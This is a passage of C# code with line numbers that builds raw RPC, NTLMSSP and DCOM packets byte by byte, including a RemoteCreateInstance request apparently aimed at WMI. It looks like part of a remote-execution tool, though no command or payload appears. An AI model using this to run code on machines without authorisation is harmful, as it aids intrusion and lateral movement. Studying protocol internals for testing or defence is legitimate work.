packet_RPCRequest.Add("RPCRequest_Version", new byte[] { 0x05 }); 171 | packet_RPCRequest.Add("RPCRequest_VersionMinor", new byte[] { 0x00 }); 172 | packet_RPCRequest.Add("RPCRequest_PacketType", new byte[] { 0x00 }); 173 | packet_RPCRequest.Add("RPCRequest_PacketFlags", packet_flags); 174 | packet_RPCRequest.Add("RPCRequest_DataRepresentation", new byte[] { 0x10, 0x00, 0x00, 0x00 }); 175 | packet_RPCRequest.Add("RPCRequest_FragLength", packet_frag_length); 176 | packet_RPCRequest.Add("RPCRequest_AuthLength", packet_auth_length3); 177 | packet_RPCRequest.Add("RPCRequest_CallID", packet_call_ID); 178 | packet_RPCRequest.Add("RPCRequest_AllocHint", packet_alloc_hint); 179 | packet_RPCRequest.Add("RPCRequest_ContextID", packet_context_ID); 180 | packet_RPCRequest.Add("RPCRequest_Opnum", packet_opnum); 181 | 182 | if (packet_data != null && packet_data.Length > 0) 183 | { 184 | packet_RPCRequest.Add("RPCRequest_Data", packet_data); 185 | } 186 | 187 | return packet_RPCRequest; 188 | 189 | } 190 | public static OrderedDictionary RPCAlterContext(byte[] packet_assoc_group, byte[] packet_call_ID, byte[] packet_context_ID, byte[] packet_interface_UUID) 191 | { 192 | OrderedDictionary packet_RPCAlterContext = new OrderedDictionary(); 193 | packet_RPCAlterContext.Add("RPCAlterContext_Version", new byte[] { 0x05 }); 194 | packet_RPCAlterContext.Add("RPCAlterContext_VersionMinor", new byte[] { 0x00 }); 195 | packet_RPCAlterContext.Add("RPCAlterContext_PacketType", new byte[] { 0x0e }); 196 | packet_RPCAlterContext.Add("RPCAlterContext_PacketFlags", new byte[] { 0x03 }); 197 | packet_RPCAlterContext.Add("RPCAlterContext_DataRepresentation", new byte[] { 0x10, 0x00, 0x00, 0x00 }); 198 | packet_RPCAlterContext.Add("RPCAlterContext_FragLength", new byte[] { 0x48, 0x00 }); 199 | packet_RPCAlterContext.Add("RPCAlterContext_AuthLength", new byte[] { 0x00, 0x00 }); 200 | packet_RPCAlterContext.Add("RPCAlterContext_CallID", packet_call_ID); 201 | packet_RPCAlterContext.Add("RPCAlterContext_MaxXmitFrag", new byte[] { 0xd0, 0x16 }); 202 | packet_RPCAlterContext.Add("RPCAlterContext_MaxRecvFrag", new byte[] { 0xd0, 0x16 }); 203 | packet_RPCAlterContext.Add("RPCAlterContext_AssocGroup", packet_assoc_group); 204 | packet_RPCAlterContext.Add("RPCAlterContext_NumCtxItems", new byte[] { 0x01 }); 205 | packet_RPCAlterContext.Add("RPCAlterContext_Unknown", new byte[] { 0x00, 0x00, 0x00 }); 206 | packet_RPCAlterContext.Add("RPCAlterContext_ContextID", packet_context_ID); 207 | packet_RPCAlterContext.Add("RPCAlterContext_NumTransItems", new byte[] { 0x01 }); 208 | packet_RPCAlterContext.Add("RPCAlterContext_Unknown2", new byte[] { 0x00 }); 209 | packet_RPCAlterContext.Add("RPCAlterContext_Interface", packet_interface_UUID); 210 | packet_RPCAlterContext.Add("RPCAlterContext_InterfaceVer", new byte[] { 0x00, 0x00 }); 211 | packet_RPCAlterContext.Add("RPCAlterContext_InterfaceVerMinor", new byte[] { 0x00, 0x00 }); 212 | packet_RPCAlterContext.Add("RPCAlterContext_TransferSyntax", new byte[] { 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60 }); 213 | packet_RPCAlterContext.Add("RPCAlterContext_TransferSyntaxVer", new byte[] { 0x02, 0x00, 0x00, 0x00 }); 214 | 215 | packet_RPCAlterContext.Add("", new byte[] { }); 216 | 217 | return packet_RPCAlterContext; 218 | } 219 | public static OrderedDictionary NTLMSSPVerifier(int packet_auth_padding, byte[] packet_auth_level, byte[] packet_sequence_number) 220 | { 221 | OrderedDictionary packet_NTLMSSPVerifier = new OrderedDictionary(); 222 | byte[] packet_auth_pad_length = null; 223 | 224 | if (packet_auth_padding == 4) 225 | { 226 | packet_NTLMSSPVerifier.Add("NTLMSSPVerifier_AuthPadding", new byte[] { 0x00, 0x00, 0x00, 0x00 }); 227 | packet_auth_pad_length = new byte[] { 0x04 }; 228 | } 229 | else if (packet_auth_padding == 8) 230 | { 231 | packet_NTLMSSPVerifier.Add("NTLMSSPVerifier_AuthPadding", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }); 232 | packet_auth_pad_length = new byte[] { 0x08 }; 233 | } 234 | else if (packet_auth_padding == 12) 235 | { 236 | packet_NTLMSSPVerifier.Add("NTLMSSPVerifier_AuthPadding", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }); 237 | packet_auth_pad_length = new byte[] { 0x0c }; 238 | } 239 | else 240 | { 241 | packet_auth_pad_length = new byte[] { 0x00 }; 242 | } 243 | 244 | packet_NTLMSSPVerifier.Add("NTLMSSPVerifier_AuthType", new byte[] { 0x0a }); 245 | packet_NTLMSSPVerifier.Add("NTLMSSPVerifier_AuthLevel", packet_auth_level); 246 | packet_NTLMSSPVerifier.Add("NTLMSSPVerifier_AuthPadLen", packet_auth_pad_length); 247 | packet_NTLMSSPVerifier.Add("NTLMSSPVerifier_AuthReserved", new byte[] { 0x00 }); 248 | packet_NTLMSSPVerifier.Add("NTLMSSPVerifier_ContextID", new byte[] { 0x00, 0x00, 0x00, 0x00 }); 249 | packet_NTLMSSPVerifier.Add("NTLMSSPVerifier_NTLMSSPVerifierVersionNumber", new byte[] { 0x01, 0x00, 0x00, 0x00 }); 250 | packet_NTLMSSPVerifier.Add("NTLMSSPVerifier_NTLMSSPVerifierChecksum", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }); 251 | packet_NTLMSSPVerifier.Add("NTLMSSPVerifier_NTLMSSPVerifierSequenceNumber", packet_sequence_number); 252 | 253 | return packet_NTLMSSPVerifier; 254 | } 255 | public static OrderedDictionary DCOMRemQueryInterface(byte[] packet_causality_ID, byte[] packet_IPID, byte[] packet_IID) 256 | { 257 | OrderedDictionary packet_DCOMRemQueryInterface = new OrderedDictionary(); 258 | 259 | packet_DCOMRemQueryInterface.Add("DCOMRemQueryInterface_VersionMajor", new byte[] { 0x05, 0x00 }); 260 | packet_DCOMRemQueryInterface.Add("DCOMRemQueryInterface_VersionMinor", new byte[] { 0x07, 0x00 }); 261 | packet_DCOMRemQueryInterface.Add("DCOMRemQueryInterface_Flags", new byte[] { 0x00, 0x00, 0x00, 0x00 }); 262 | packet_DCOMRemQueryInterface.Add("DCOMRemQueryInterface_Reserved", new byte[] { 0x00, 0x00, 0x00, 0x00 }); 263 | packet_DCOMRemQueryInterface.Add("DCOMRemQueryInterface_CausalityID", packet_causality_ID); 264 | packet_DCOMRemQueryInterface.Add("DCOMRemQueryInterface_Reserved2", new byte[] { 0x00, 0x00, 0x00, 0x00 }); 265 | packet_DCOMRemQueryInterface.Add("DCOMRemQueryInterface_IPID", packet_IPID); 266 | packet_DCOMRemQueryInterface.Add("DCOMRemQueryInterface_Refs", new byte[] { 0x05, 0x00, 0x00, 0x00 }); 267 | packet_DCOMRemQueryInterface.Add("DCOMRemQueryInterface_IIDs", new byte[] { 0x01, 0x00 }); 268 | packet_DCOMRemQueryInterface.Add("DCOMRemQueryInterface_Unknown", new byte[] { 0x00, 0x00, 0x01, 0x00, 0x00, 0x00 }); 269 | packet_DCOMRemQueryInterface.Add("DCOMRemQueryInterface_", packet_IID); 270 | 271 | return packet_DCOMRemQueryInterface; 272 | } 273 | public static OrderedDictionary DCOMRemRelease(byte[] packet_causality_ID, byte[] packet_IPID, byte[] packet_IPID2) 274 | { 275 | OrderedDictionary packet_DCOMRemRelease = new OrderedDictionary(); 276 | packet_DCOMRemRelease.Add("packet_DCOMRemRelease_VersionMajor", new byte[] { 0x05, 0x00 }); 277 | packet_DCOMRemRelease.Add("packet_DCOMRemRelease_VersionMinor", new byte[] { 0x07, 0x00 }); 278 | packet_DCOMRemRelease.Add("packet_DCOMRemRelease_Flags", new byte[] { 0x00, 0x00, 0x00, 0x00 }); 279 | packet_DCOMRemRelease.Add("packet_DCOMRemRelease_Reserved", new byte[] { 0x00, 0x00, 0x00, 0x00 }); 280 | packet_DCOMRemRelease.Add("packet_DCOMRemRelease_CausalityID", packet_causality_ID); 281 | packet_DCOMRemRelease.Add("packet_DCOMRemRelease_Reserved2", new byte[] { 0x00, 0x00, 0x00, 0x00 }); 282 | packet_DCOMRemRelease.Add("packet_DCOMRemRelease_Unknown", new byte[] { 0x02, 0x00, 0x00, 0x00 }); 283 | packet_DCOMRemRelease.Add("packet_DCOMRemRelease_InterfaceRefs", new byte[] { 0x02, 0x00, 0x00, 0x00 }); 284 | packet_DCOMRemRelease.Add("packet_DCOMRemRelease_IPID", packet_IPID); 285 | packet_DCOMRemRelease.Add("packet_DCOMRemRelease_PublicRefs", new byte[] { 0x05, 0x00, 0x00, 0x00 }); 286 | packet_DCOMRemRelease.Add("packet_DCOMRemRelease_PrivateRefs", new byte[] { 0x00, 0x00, 0x00, 0x00 }); 287 | packet_DCOMRemRelease.Add("packet_DCOMRemRelease_packet_IPID2", packet_IPID2); 288 | packet_DCOMRemRelease.Add("packet_DCOMRemRelease_PublicRefs2", new byte[] { 0x05, 0x00, 0x00, 0x00 }); 289 | packet_DCOMRemRelease.Add("packet_DCOMRemRelease_PrivateRefs2", new byte[] { 0x00, 0x00, 0x00, 0x00 }); 290 | return packet_DCOMRemRelease; 291 | } 292 | public static OrderedDictionary DCOMRemoteCreateInstance(byte[] packet_causality_ID, string packet_target) 293 | { 294 | 295 | byte[] packet_target_unicode = Encoding.Unicode.GetBytes(packet_target); 296 | byte[] packet_target_length = BitConverter.GetBytes(packet_target.Length + 1); 297 | double bytesize = (Math.Truncate((double)packet_target_unicode.Length / 8 + 1) * 8) - packet_target_unicode.Length; 298 | packet_target_unicode = packet_target_unicode.Concat(new byte[Convert.ToInt32(bytesize)]).ToArray(); 299 | byte[] packet_cntdata = BitConverter.GetBytes(packet_target_unicode.Length + 720); 300 | byte[] packet_size = BitConverter.GetBytes(packet_target_unicode.Length + 680); 301 | byte[] packet_total_size = BitConverter.GetBytes(packet_target_unicode.Length + 664); 302 | byte[] packet_private_header = BitConverter.GetBytes(packet_target_unicode.Length + 40).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray(); 303 | byte[] packet_property_data_size = BitConverter.GetBytes(packet_target_unicode.Length + 56); 304 | 305 | OrderedDictionary packet_DCOMRemoteCreateInstance = new OrderedDictionary(); 306 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_DCOMVersionMajor", new byte[] { 0x05, 0x00 }); 307 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_DCOMVersionMinor", new byte[] { 0x07, 0x00 }); 308 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_DCOMFlags", new byte[] { 0x01, 0x00, 0x00, 0x00 }); 309 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_DCOMReserved", new byte[] { 0x00, 0x00, 0x00, 0x00 }); 310 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_DCOMCausalityID", packet_causality_ID); 311 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_Unknown", new byte[] { 0x00, 0x00, 0x00, 0x00 }); 312 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_Unknown2", new byte[] { 0x00, 0x00, 0x00, 0x00 }); 313 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_Unknown3", new byte[] { 0x00, 0x00, 0x02, 0x00 }); 314 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_Unknown4", packet_cntdata); 315 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCntData", packet_cntdata); 316 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesOBJREFSignature", new byte[] { 0x4d, 0x45, 0x4f, 0x57 }); 317 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesOBJREFFlags", new byte[] { 0x04, 0x00, 0x00, 0x00 }); 318 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesOBJREFIID", new byte[] { 0xa2, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 }); 319 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFCLSID", new byte[] { 0x38, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 }); 320 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFCBExtension", new byte[] { 0x00, 0x00, 0x00, 0x00 }); 321 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFSize", packet_size); 322 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesTotalSize", packet_total_size); 323 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesReserved", new byte[] { 0x00, 0x00, 0x00, 0x00 }); 324 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesCustomHeaderCommonHeader", new byte[] { 0x01, 0x10, 0x08, 0x00, 0xcc, 0xcc, 0xcc, 0xcc }); 325 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesCustomHeaderPrivateHeader", new byte[] { 0xb0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }); 326 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesCustomHeaderTotalSize", packet_total_size); 327 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesCustomHeaderCustomHeaderSize", new byte[] { 0xc0, 0x00, 0x00, 0x00 }); 328 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesCustomHeaderReserved", new byte[] { 0x00, 0x00, 0x00, 0x00 }); 329 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesDestinationContext", new byte[] { 0x02, 0x00, 0x00, 0x00 }); 330 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesNumActivationPropertyStructs", new byte[] { 0x06, 0x00, 0x00, 0x00 }); 331 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsInfoClsid", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }); 332 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsIdPtrReferentID", new byte[] { 0x00, 0x00, 0x02, 0x00 }); 333 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsSizesPtrReferentID", new byte[] { 0x04, 0x00, 0x02, 0x00 }); 334 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesNULLPointer", new byte[] { 0x00, 0x00, 0x00, 0x00 }); 335 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsIdPtrMaxCount", new byte[] { 0x06, 0x00, 0x00, 0x00 }); 336 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsIdPtrPropertyStructGuid", new byte[] { 0xb9, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 }); 337 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsIdPtrPropertyStructGuid2", new byte[] { 0xab, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 }); 338 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsIdPtrPropertyStructGuid3", new byte[] { 0xa5, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 }); 339 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsIdPtrPropertyStructGuid4", new byte[] { 0xa6, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 }); 340 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsIdPtrPropertyStructGuid5", new byte[] { 0xa4, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 }); 341 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsIdPtrPropertyStructGuid6", new byte[] { 0xaa, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 }); 342 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsSizesPtrMaxCount", new byte[] { 0x06, 0x00, 0x00, 0x00 }); 343 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsSizesPtrPropertyDataSize", new byte[] { 0x68, 0x00, 0x00, 0x00 }); 344 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsSizesPtrPropertyDataSize2", new byte[] { 0x58, 0x00, 0x00, 0x00 }); 345 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsSizesPtrPropertyDataSize3", new byte[] { 0x90, 0x00, 0x00, 0x00 }); 346 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsSizesPtrPropertyDataSize4", packet_property_data_size); 347 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsSizesPtrPropertyDataSize5", new byte[] { 0x20, 0x00, 0x00, 0x00 }); 348 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesClsSizesPtrPropertyDataSize6", new byte[] { 0x30, 0x00, 0x00, 0x00 }); 349 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesCommonHeader", new byte[] { 0x01, 0x10, 0x08, 0x00, 0xcc, 0xcc, 0xcc, 0xcc }); 350 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesPrivateHeader", new byte[] { 0x58, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }); 351 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesSessionID", new byte[] { 0xff, 0xff, 0xff, 0xff }); 352 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesRemoteThisSessionID", new byte[] { 0x00, 0x00, 0x00, 0x00 }); 353 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesClientImpersonating", new byte[] { 0x00, 0x00, 0x00, 0x00 }); 354 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesPartitionIDPresent", new byte[] { 0x00, 0x00, 0x00, 0x00 }); 355 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesDefaultAuthnLevel", new byte[] { 0x02, 0x00, 0x00, 0x00 }); 356 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesPartitionGuid", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }); 357 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesProcessRequestFlags", new byte[] { 0x00, 0x00, 0x00, 0x00 }); 358 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesOriginalClassContext", new byte[] { 0x14, 0x00, 0x00, 0x00 }); 359 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesFlags", new byte[] { 0x02, 0x00, 0x00, 0x00 }); 360 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesReserved", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }); 361 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSpecialSystemPropertiesUnusedBuffer", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }); 362 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInfoCommonHeader", new byte[] { 0x01, 0x10, 0x08, 0x00, 0xcc, 0xcc, 0xcc, 0xcc }); 363 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInfoPrivateHeader", new byte[] { 0x48, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }); 364 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInfoInstantiatedObjectClsId", new byte[] { 0x5e, 0xf0, 0xc3, 0x8b, 0x6b, 0xd8, 0xd0, 0x11, 0xa0, 0x75, 0x00, 0xc0, 0x4f, 0xb6, 0x88, 0x20 }); 365 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInfoClassContext", new byte[] { 0x14, 0x00, 0x00, 0x00 }); 366 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInfoActivationFlags", new byte[] { 0x00, 0x00, 0x00, 0x00 }); 367 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInfoFlagsSurrogate", new byte[] { 0x00, 0x00, 0x00, 0x00 }); 368 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInfoInterfaceIdCount", new byte[] { 0x01, 0x00, 0x00, 0x00 }); 369 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInfoInstantiationFlag", new byte[] { 0x00, 0x00, 0x00, 0x00 }); 370 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInterfaceIdsPtr", new byte[] { 0x00, 0x00, 0x02, 0x00 }); 371 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationEntirePropertySize", new byte[] { 0x58, 0x00, 0x00, 0x00 }); 372 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationVersionMajor", new byte[] { 0x05, 0x00 }); 373 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationVersionMinor", new byte[] { 0x07, 0x00 }); 374 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInterfaceIdsPtrMaxCount", new byte[] { 0x01, 0x00, 0x00, 0x00 }); 375 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInterfaceIds", new byte[] { 0x18, 0xad, 0x09, 0xf3, 0x6a, 0xd8, 0xd0, 0x11, 0xa0, 0x75, 0x00, 0xc0, 0x4f, 0xb6, 0x88, 0x20 }); 376 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesInstantiationInterfaceIdsUnusedBuffer", new byte[] { 0x00, 0x00, 0x00, 0x00 }); 377 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoCommonHeader", new byte[] { 0x01, 0x10, 0x08, 0x00, 0xcc, 0xcc, 0xcc, 0xcc }); 378 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoPrivateHeader", new byte[] { 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }); 379 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoClientOk", new byte[] { 0x00, 0x00, 0x00, 0x00 }); 380 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoReserved", new byte[] { 0x00, 0x00, 0x00, 0x00 }); 381 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoReserved2", new byte[] { 0x00, 0x00, 0x00, 0x00 }); 382 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoReserved3", new byte[] { 0x00, 0x00, 0x00, 0x00 }); 383 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoClientPtrReferentID", new byte[] { 0x00, 0x00, 0x02, 0x00 }); 384 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoNULLPtr", new byte[] { 0x00, 0x00, 0x00, 0x00 }); 385 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoClientPtrClientContextUnknown", new byte[] { 0x60, 0x00, 0x00, 0x00 }); 386 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoClientPtrClientContextCntData", new byte[] { 0x60, 0x00, 0x00, 0x00 }); 387 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoClientPtrClientContextOBJREFSignature", new byte[] { 0x4d, 0x45, 0x4f, 0x57 }); 388 | 